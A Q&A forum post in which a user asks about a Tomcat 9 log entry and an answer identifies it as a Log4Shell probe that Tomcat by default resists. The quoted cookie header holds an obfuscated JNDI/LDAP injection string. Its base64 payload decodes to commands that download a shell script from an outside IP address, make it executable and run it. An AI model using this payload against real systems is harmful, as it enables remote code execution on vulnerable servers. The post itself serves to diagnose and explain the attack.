2

From Tomcat9 catalina log:

org.apache.tomcat.util.http.parser.Cookie.logInvalidHeader A cookie 
header was received [('${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-
l}dap${env:BARFOO:-:}//ip:1389/TomcatBypass/Command/Base64/Y2QgL3
RtcCB8fCBjZCAvdmFyL3J1biB8fCBjZCAvbW50IHx8IGNkIC9yb290IHx8IGNkIC87IHdnZXQgaH
R0cDovLzE2Ny45OS40OS4xMzIvOFVzQS5zaDsgY3VybCAtTyBodHRwOi8vMTY3Ljk5LjQ5LjEzMi
84VXNBLnNoOyBjaG1vZCA3NzcgOFVzQS5zaDsgc2ggOFVzQS5zaA==}')] that contained an
invalid cookie. That cookie will be ignored.

What is the cookie? Is it an attack?

eastwater
  • 4,624
  • 9
  • 49
  • 118

1 Answers1

4

This is a probe of your installation for the Log4Shell attack.

By default - Tomcat is immune to the attack.

But you could still could be subject to the attack if you (in your custom webapp) use an vulnerable log4j version.

Tim Funk
  • 869
  • 7
  • 11